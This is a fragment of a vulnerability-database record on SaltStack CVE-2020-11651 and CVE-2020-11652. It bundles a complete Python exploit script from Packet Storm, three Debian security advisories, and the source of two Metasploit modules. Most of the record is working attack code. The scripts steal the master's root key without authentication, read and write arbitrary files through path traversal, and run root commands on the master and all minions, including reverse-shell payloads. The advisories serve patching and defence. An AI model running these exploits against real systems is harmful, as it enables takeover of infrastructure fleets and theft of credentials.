"https://packetstormsecurity.com/files/157560/Saltstack-3000.1-Remote-Code-Execution.html", "title": "Saltstack 3000.1 Remote Code Execution", "type": "packetstorm", "sourceData": "`# Exploit Title: Saltstack 3000.1 - Remote Code Execution \n# Date: 2020-05-04 \n# Exploit Author: Jasper Lievisse Adriaanse \n# Vendor Homepage: https://www.saltstack.com/ \n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.* \n# Tested on: Debian 10 with Salt 2019.2.0 \n# CVE : CVE-2020-11651 and CVE-2020-11652 \n# Discription: Saltstack authentication bypass/remote code execution \n# \n# Source: https://github.com/jasperla/CVE-2020-11651-poc \n# This exploit is based on this checker script: \n# https://github.com/rossengeorgiev/salt-security-backports \n \n#!/usr/bin/env python \n# \n# Exploit for CVE-2020-11651 and CVE-2020-11652 \n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc) \n# This exploit is based on this checker script: \n# https://github.com/rossengeorgiev/salt-security-backports \n \nfrom __future__ import absolute_import, print_function, unicode_literals \nimport argparse \nimport datetime \nimport os \nimport os.path \nimport sys \nimport time \n \nimport salt \nimport salt.version \nimport salt.transport.client \nimport salt.exceptions \n \ndef init_minion(master_ip, master_port): \nminion_config = { \n'transport': 'zeromq', \n'pki_dir': '/tmp', \n'id': 'root', \n'log_level': 'debug', \n'master_ip': master_ip, \n'master_port': master_port, \n'auth_timeout': 5, \n'auth_tries': 1, \n'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port) \n} \n \nreturn salt.transport.client.ReqChannel.factory(minion_config, crypt='clear') \n \n# --- check funcs ---- \n \ndef check_salt_version(): \nprint(\"[+] Salt version: {}\".format(salt.version.__version__)) \n \nvi = salt.version.__version_info__ \n \nif (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)): \nreturn True \nelse: \nreturn False \n \ndef check_connection(master_ip, master_port, channel): \nprint(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='') \nsys.stdout.flush() \n \n# connection check \ntry: \nchannel.send({'cmd':'ping'}, timeout=2) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"OFFLINE\") \nsys.exit(1) \nelse: \nprint(\"ONLINE\") \n \ndef check_CVE_2020_11651(channel): \nprint(\"[+] Checking if vulnerable to CVE-2020-11651... \", end='') \nsys.stdout.flush() \n# try to evil \ntry: \nrets = channel.send({'cmd': '_prep_auth_info'}, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"YES\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \npass \nfinally: \nif rets: \nroot_key = rets[2]['root'] \nreturn root_key \n \nreturn None \n \ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'cmd': 'get_token', \n'arg': [], \n'token': top_secret_file_path, \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"YES\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \nprint(\"NO\") \n \ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.read', \n'path': top_secret_file_path, \n'saltenv': 'base', \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"TIMEOUT\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \nif rets['data']['return']: \nprint(\"YES\") \nelse: \nprint(\"NO\") \n \ndef check_CVE_2020_11652_write1(debug, channel, root_key): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.write', \n'path': '../../../../../../../../tmp/salt_CVE_2020_11652', \n'data': 'evil', \n'saltenv': 'base', \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"TIMEOUT\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \n \npp(rets) \nif rets['data']['return'].startswith('Wrote'): \ntry: \nos.remove('/tmp/salt_CVE_2020_11652') \nexcept OSError: \nprint(\"Maybe?\") \nelse: \nprint(\"YES\") \nelse: \nprint(\"NO\") \n \ndef check_CVE_2020_11652_write2(debug, channel, root_key): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'config.update_config', \n'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652', \n'yaml_contents': 'evil', \n'saltenv': 'base', \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"TIMEOUT\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \nif rets['data']['return'].startswith('Wrote'): \ntry: \nos.remove('/tmp/salt_CVE_2020_11652.conf') \nexcept OSError: \nprint(\"Maybe?\") \nelse: \nprint(\"YES\") \nelse: \nprint(\"NO\") \n \ndef pwn_read_file(channel, root_key, path, master_ip): \nprint(\"[+] Attemping to read {} from {}\".format(path, master_ip)) \nsys.stdout.flush() \n \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.read', \n'path': path, \n'saltenv': 'base', \n} \n \nrets = channel.send(msg, timeout=3) \nprint(rets['data']['return'][0][path]) \n \ndef pwn_upload_file(channel, root_key, src, dest, master_ip): \nprint(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip)) \nsys.stdout.flush() \n \ntry: \nfh = open(src, 'rb') \npayload = fh.read() \nfh.close() \nexcept Exception as e: \nprint('[-] Failed to read {}: {}'.format(src, e)) \nreturn \n \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.write', \n'saltenv': 'base', \n'data': payload, \n'path': dest, \n} \n \nrets = channel.send(msg, timeout=3) \nprint('[ ] {}'.format(rets['data']['return'])) \n \ndef pwn_exec(channel, root_key, cmd, master_ip, jid): \nprint(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip)) \nsys.stdout.flush() \n \nmsg = { \n'key': root_key, \n'cmd': 'runner', \n'fun': 'salt.cmd', \n'saltenv': 'base', \n'user': 'sudo_user', \n'kwarg': { \n'fun': 'cmd.exec_code', \n'lang': 'python', \n'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd) \n}, \n'jid': jid, \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept Exception as e: \nprint('[-] Failed to submit job') \nreturn \n \nif rets.get('jid'): \nprint('[+] Successfully scheduled job: {}'.format(rets['jid'])) \n \ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid): \nprint(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip)) \nsys.stdout.flush() \n \nmsg = { \n'key': root_key, \n'cmd': '_send_pub', \n'fun': 'cmd.run', \n'user': 'root', \n'arg': [ \"/bin/sh -c '{}'\".format(cmd) ], \n'tgt': '*', \n'tgt_type': 'glob', \n'ret': '', \n'jid': jid \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept Exception as e: \nprint('[-] Failed to submit job') \nreturn \nfinally: \nif rets == None: \nprint('[+] Successfully submitted job to all minions.') \nelse: \nprint('[-] Failed to submit job') \n \n \ndef main(): \nparser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652') \nparser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1') \nparser.add_argument('--port', '-p', dest='master_port', default='4506') \nparser.add_argument('--force', '-f', dest='force', default=False, action='store_false') \nparser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true') \nparser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true') \nparser.add_argument('--read', '-r', dest='read_file') \nparser.add_argument('--upload-src', dest='upload_src') \nparser.add_argument('--upload-dest', dest='upload_dest') \nparser.add_argument('--exec', dest='exec', help='Run a command on the master') \nparser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions') \nargs = parser.parse_args() \n \nprint(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\") \ntime.sleep(1) \n \n# Both src and destination are required for uploads \nif (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None): \nprint('[-] Must provide both --upload-src and --upload-dest') \nsys.exit(1) \n \nchannel = init_minion(args.master_ip, args.master_port) \n \nif check_salt_version(): \nprint(\"[ ] This version of salt is vulnerable! Check results below\") \nelif args.force: \nprint(\"[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.\") \nelse: \nsys.exit() \n \ncheck_connection(args.master_ip, args.master_port, channel) \n \nroot_key = check_CVE_2020_11651(channel) \nif root_key: \nprint('\\n[*] root key obtained: {}'.format(root_key)) \nelse: \nprint('[-] Failed to find root key...aborting') \nsys.exit(127) \n \nif args.run_checks: \n# Assuming this check runs on the master itself, create a file with \"secret\" content \n# and abuse CVE-2020-11652 to read it. \ntop_secret_file_path = '/tmp/salt_cve_teta' \nwith salt.utils.fopen(top_secret_file_path, 'w') as fd: \nfd.write(\"top secret\") \n \n# Again, this assumes we're running this check on the master itself \nwith salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd: \nroot_key = keyfd.read() \n \ncheck_CVE_2020_11652_read_token(debug, channel, top_secret_file_path) \ncheck_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key) \ncheck_CVE_2020_11652_write1(debug, channel, root_key) \ncheck_CVE_2020_11652_write2(debug, channel, root_key) \nos.remove(top_secret_file_path) \nsys.exit(0) \n \nif args.read_file: \npwn_read_file(channel, root_key, args.read_file, args.master_ip) \n \nif args.upload_src: \nif os.path.isabs(args.upload_dest): \nprint('[-] Destination path must be relative; aborting') \nsys.exit(1) \npwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip) \n \n \njid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow()) \n \nif args.exec: \npwn_exec(channel, root_key, args.exec, args.master_ip, jid) \n \nif args.exec_all: \nprint(\"[!] Lester, is this what you want? Hit ^C to abort.\") \ntime.sleep(2) \npwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/157560/saltstack30001-exec.txt"}], "debian": [{"lastseen": "2020-05-30T12:54:02", "bulletinFamily": "unix", "description": "Package : salt\nVersion : 2014.1.13+ds-3+deb8u1\nCVE ID : CVE-2020-11651 CVE-2020-11652\nDebian Bug : 959684\n\n\nSeveral vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\n The salt-master process ClearFuncs class does not properly validate\n method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user\n tokens from the salt master and/or run arbitrary commands on salt\n minions.\n\nCVE-2020-11652\n\n The salt-master process ClearFuncs class allows access to some\n methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2020-05-30T04:21:36", "published": "2020-05-30T04:21:36", "id": "DEBIAN:DLA-2223-1:998E3", "href": "https://lists.debian.org/debian-lts-announce/2020/debian-lts-announce-202005/msg00027.html", "title": "[SECURITY] [DLA 2223-1] salt security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T12:58:19", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4676-2 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 07, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : salt\nCVE ID : CVE-2020-11651 CVE-2020-11652\nDebian Bug : 959684\n\nThe update for salt for the oldstable distribution (stretch) released as\nDSA 4676-1 contained an incomplete fix to address CVE-2020-11651 and\nCVE-2020-11652. Updated salt packages are now available to correct this\nissue. For reference, the original advisory text follows.\n\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u4.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2020-05-07T20:16:23", "published": "2020-05-07T20:16:23", "id": "DEBIAN:DSA-4676-2:0B1C8", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2020/msg00085.html", "title": "[SECURITY] [DSA 4676-2] salt security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T12:59:07", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4676-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 06, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : salt\nCVE ID : CVE-2019-17361 CVE-2020-11651 CVE-2020-11652\nDebian Bug : 949222 959684\n\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2020-05-06T04:15:52", "published": "2020-05-06T04:15:52", "id": "DEBIAN:DSA-4676-1:8BF11", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2020/msg00079.html", "title": "[SECURITY] [DSA 4676-1] salt security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-05-30T18:05:02", "bulletinFamily": "exploit", "description": "This module exploits unauthenticated access to the runner() and _send_pub() methods in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to execute code as root on either the master or on select minions. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.\n", "modified": "2020-05-29T17:24:14", "published": "2020-05-07T16:57:59", "id": "MSF:EXPLOIT/LINUX/MISC/SALTSTACK_SALT_UNAUTH_RCE", "href": "", "type": "metasploit", "title": "SaltStack Salt Master/Minion Unauthenticated RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::ZeroMQ\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::CmdStager::HTTP # HACK: This is a mixin of a mixin\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt Master/Minion Unauthenticated RCE',\n 'Description' => %q{\n This module exploits unauthenticated access to the runner() and\n _send_pub() methods in the SaltStack Salt master's ZeroMQ request\n server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to\n execute code as root on either the master or on select minions.\n\n VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as\n well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual\n Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2,\n 1.3, 1.5, and 1.6 in certain configurations, are known to be affected\n by the Salt vulnerabilities.\n\n Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n well as Vulhub's Docker image.\n },\n 'Author' => [\n 'F-Secure', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-11651'], # Auth bypass (used by this module)\n ['CVE', '2020-11652'], # Authed directory traversals (not used here)\n ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],\n ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG'],\n ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']\n ],\n 'DisclosureDate' => '2020-04-30', # F-Secure advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['python', 'unix'],\n 'Arch' => [ARCH_PYTHON, ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Master (Python payload)',\n 'Description' => 'Executing Python payload on the master',\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\n }\n ],\n [\n 'Master (Unix command)',\n 'Description' => 'Executing Unix command on the master',\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n ],\n [\n 'Minions (Python payload)',\n 'Description' => 'Executing Python payload on the minions',\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\n }\n ],\n [\n 'Minions (Unix command)',\n 'Description' => 'Executing Unix command on the minions',\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n # cmd/unix/reverse_python_ssl crashes in this target\n 'PAYLOAD' => 'cmd/unix/reverse_python'\n }\n ]\n ],\n 'DefaultTarget' => 0, # Defaults to master for safety\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/gather/saltstack_salt_root_key'\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(4506),\n OptString.new('ROOT_KEY', [false, \"Master's root key if you have it\"]),\n OptRegexp.new('MINIONS', [true, 'PCRE regex of minions to target', /.*/])\n ])\n\n register_advanced_options([\n OptInt.new('WfsDelay', [true, 'Seconds to wait for *all* sessions', 10])\n ])\n\n # XXX: https://github.com/rapid7/metasploit-framework/issues/12963\n import_target_defaults\n end\n\n # NOTE: check is provided by auxiliary/gather/saltstack_salt_root_key\n\n def exploit\n if target.name.start_with?('Master')\n if (root_key = datastore['ROOT_KEY'])\n print_status(\"User-specified root key: #{root_key}\")\n else\n # check.reason is from auxiliary/gather/saltstack_salt_root_key\n root_key = check.reason\n end\n\n unless root_key\n fail_with(Failure::BadConfig,\n \"#{target['Description']} requires a root key\")\n end\n end\n\n # These are from Msf::Exploit::Remote::ZeroMQ\n zmq_connect\n zmq_negotiate\n\n print_status(\"#{target['Description']}: #{datastore['PAYLOAD']}\")\n\n case target.name\n when /^Master/\n yeet_runner(root_key)\n when /^Minions/\n yeet_send_pub\n end\n\n # HACK: Hijack WfsDelay to wait for _all_ sessions, not just the first one\n sleep(wfs_delay)\n rescue EOFError, Rex::ConnectionError => e\n print_error(\"#{e.class}: #{e.message}\")\n ensure\n # This is from Msf::Exploit::Remote::ZeroMQ\n zmq_disconnect\n end\n\n def yeet_runner(root_key)\n print_status(\"Yeeting runner() at #{peer}\")\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L1898-L1951\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L1898-L1951\n runner = {\n 'cmd' => 'runner',\n # https://docs.saltstack.com/en/master/ref/runners/all/salt.runners.salt.html#salt.runners.salt.cmd\n 'fun' => 'salt.cmd',\n 'kwarg' => {\n 'hide_output' => true,\n 'ignore_retcode' => true,\n 'output_loglevel' => 'quiet'\n },\n 'user' => 'root', # This is NOT the Unix user!\n 'key' => root_key # No JID needed, only the root key!\n }\n\n case target['Type']\n when :python\n vprint_status(\"Executing Python code: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\n runner['kwarg'].merge!(\n 'fun' => 'cmd.exec_code',\n 'lang' => payload.arch.first,\n 'code' => payload.encoded\n )\n when :unix_command\n # HTTPS doesn't appear to be supported by the server :(\n print_status(\"Serving intermediate stager over HTTP: #{start_service}\")\n\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.script\n runner['kwarg'].merge!(\n # cmd.run doesn't work due to a missing argument error, so we use this\n 'fun' => 'cmd.script',\n 'source' => get_uri,\n 'stdin' => payload.encoded\n )\n end\n\n vprint_status(\"Unserialized clear load: #{runner}\")\n zmq_send_message(serialize_clear_load(runner))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive runner() response')\n end\n\n vprint_good(\"Received runner() response: #{res.inspect}\")\n end\n\n def yeet_send_pub\n print_status(\"Yeeting _send_pub() at #{peer}\")\n\n # NOTE: A unique JID (job ID) is needed for every published job\n jid = generate_jid\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L2043-L2151\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L2043-L2151\n send_pub = {\n 'cmd' => '_send_pub',\n 'kwargs' => {\n 'bg' => true,\n 'hide_output' => true,\n 'ignore_retcode' => true,\n 'output_loglevel' => 'quiet',\n 'show_jid' => false,\n 'show_timeout' => false\n },\n 'user' => 'root', # This is NOT the Unix user!\n 'tgt' => datastore['MINIONS'].source,\n 'tgt_type' => 'pcre',\n 'jid' => jid\n }\n\n case target['Type']\n when :python\n vprint_status(\"Executing Python code: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\n send_pub.merge!(\n 'fun' => 'cmd.exec_code',\n 'arg' => [payload.arch.first, payload.encoded]\n )\n when :unix_command\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.run\n send_pub.merge!(\n 'fun' => 'cmd.run',\n 'arg' => [payload.encoded]\n )\n end\n\n vprint_status(\"Unserialized clear load: #{send_pub}\")\n zmq_send_message(serialize_clear_load(send_pub))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive _send_pub() response')\n end\n\n vprint_good(\"Received _send_pub() response: #{res.inspect}\")\n\n # NOTE: This path will likely change between platforms and distros\n register_file_for_cleanup(\"/var/cache/salt/minion/proc/#{jid}\")\n end\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/utils/jid.py\n # https://github.com/saltstack/salt/blob/v3000.1/salt/utils/jid.py\n def generate_jid\n DateTime.now.new_offset.strftime('%Y%m%d%H%M%S%6N')\n end\n\n # HACK: Stub out the command stager used by Msf::Exploit::CmdStager::HTTP\n def stager_instance\n nil\n end\n\n # HACK: Sub out the executable used by Msf::Exploit::CmdStager::HTTP\n def exe\n # NOTE: The shebang line is necessary in this case!\n <<~SHELL\n #!/bin/sh\n /bin/sh\n SHELL\n end\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb"}, {"lastseen": "2020-05-30T18:03:08", "bulletinFamily": "exploit", "description": "This module exploits unauthenticated access to the _prep_auth_info() method in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the root key used to authenticate administrative commands to the master. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.\n", "modified": "2020-05-29T17:24:14", "published": "2020-05-06T09:45:56", "id": "MSF:AUXILIARY/GATHER/SALTSTACK_SALT_ROOT_KEY", "href": "", "type": "metasploit", "title": "SaltStack Salt Master Server Root Key Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::ZeroMQ\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt Master Server Root Key Disclosure',\n 'Description' => %q{\n This module exploits unauthenticated access to the _prep_auth_info()\n method in the SaltStack Salt master's ZeroMQ request server, for\n versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the\n root key used to authenticate administrative commands to the master.\n\n VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as\n well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual\n Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2,\n 1.3, 1.5, and 1.6 in certain configurations, are known to be affected\n by the Salt vulnerabilities.\n\n Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n well as Vulhub's Docker image.\n },\n 'Author' => [\n 'F-Secure', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-11651'], # Auth bypass (used by this module)\n ['CVE', '2020-11652'], # Authed directory traversals (not used here)\n ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],\n ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG'],\n ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']\n ],\n 'DisclosureDate' => '2020-04-30', # F-Secure advisory\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Dump', 'Description' => 'Dump root key from Salt master']\n ],\n 'DefaultAction' => 'Dump',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n Opt::RPORT(4506)\n ])\n end\n\n def run\n # These are from Msf::Exploit::Remote::ZeroMQ\n zmq_connect\n zmq_negotiate\n\n unless (root_key = extract_root_key(yeet_prep_auth_info))\n print_error('Could not find root key in serialized auth info')\n\n # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce\n return Exploit::CheckCode::Safe\n end\n\n print_good(\"Root key: #{root_key}\")\n\n # I hate this API, but store the root key in creds, too\n create_credential_and_login(\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n address: rhost,\n port: rport,\n protocol: 'tcp',\n service_name: 'salt/zeromq',\n username: 'root',\n private_data: root_key,\n private_type: :password\n )\n\n # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce\n Exploit::CheckCode::Vulnerable(root_key) # And the root key as the reason!\n rescue EOFError, Rex::ConnectionError => e\n print_error(\"#{e.class}: #{e.message}\")\n ensure\n # This is from Msf::Exploit::Remote::ZeroMQ\n zmq_disconnect\n end\n\n def yeet_prep_auth_info\n print_status(\"Yeeting _prep_auth_info() at #{peer}\")\n\n zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info'))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive auth info')\n end\n\n unless res.match(/user.+UserAuthenticationError.+root/m)\n fail_with(Failure::UnexpectedReply,\n \"Did not receive serialized auth info: #{res.inspect}\")\n end\n\n vprint_good('Received serialized auth info')\n\n # HACK: Strip assumed ZeroMQ header and leave assumed MessagePack \"load\"\n res[4..-1]\n end\n\n def extract_root_key(auth_info)\n # Fetch root key from appropriate index of deserialized data, presumably\n MessagePack.unpack(auth_info)[2]&.fetch('root')\n rescue EOFError, KeyError, MessagePack::MalformedFormatError => e\n print_error(\"#{__method__} failed: #{e.message}\")\n nil\n end\n\nend\n", 